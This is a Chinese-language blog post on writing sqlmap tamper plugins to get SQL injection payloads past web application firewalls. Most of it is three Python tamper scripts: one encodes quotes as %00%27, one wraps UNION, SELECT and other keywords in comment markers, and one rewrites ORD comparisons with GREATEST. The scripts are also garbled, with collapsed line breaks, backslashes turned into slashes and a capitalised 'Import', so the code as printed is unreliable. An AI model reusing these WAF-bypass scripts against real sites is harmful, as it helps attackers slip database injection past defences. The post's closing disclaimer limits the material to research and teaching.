tamper是sqlmap的一个集合的专门用来过WAF的插件,近期对这个比较感兴趣,就收集收集整理整理下。
下面是一个简单版的payload 代码:
from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies(): pass def tamper(payload,**kwargs): if payload: payload = payload.replace('/'', "%00%27") print payload return payload
第一行和三行,都是制定插件的优先级的,一般是起作用于多个插件之间排序用的。
Dependencies() 这个函数不清楚而且大部分都是 pass ,所以我也就不去注意了。
Def tamper(payload,**kwargs)是这个插件的核心函数,payload 是主要的传递参数,**kwargs 也用少,没仔细测过。
用过 if 判断这个 payload 是否存有参数,如果有,那么把里面的 单引号’替换为 %00%27 。
最后返回函数本身这个 payload ,那个print 是我测试的时候输出看看的。
一般大家过狗的时候,都是使用 /**/,在注释里面添加一些特殊符号,等等来绕过正则,那么简单的编写可以这样:
from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies(): pass def tamper(payload,**kwargs): if payload: csfh = "/*@^.^@*/" payload = payload.replace('UNION',csfh+"UNION"+csfh) payload = payload.replace('SELECT',csfh+"SELECT"+csfh) payload = payload.replace('AND',csfh+"AND"+csfh) payload = payload.replace('=',csfh+"="+csfh) payload = payload.replace(' ',csfh) payload = payload.replace('FROM',csfh+"FROM"+csfh) return payload
这个主要是把联合查询的周围都加上/**/来绕过。
当然如果自己写,肯定不止这些了,可以通过正则把一些语句正则出来,然后再去替换自己需要修改的SQL语句。
#!/usr/bin/env python Import re from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies(): pass def tamper(payload, **kwargs): retVal = payload if payload: match = re.search(r"(if/()(ORD/(.*?/))>(/d+)", payload, re.I) if match: _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(2), match.group(3), match.group(2)) retVal = retVal.replace(match.group(0), _) return retVal
这个是乌云漏洞库一个58的漏洞,白帽子自己写了一个过WAF的方法插件。
不过这种绕过方法就得靠自己扎实的SQL语法和正则能力了。
作者: shiyan
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论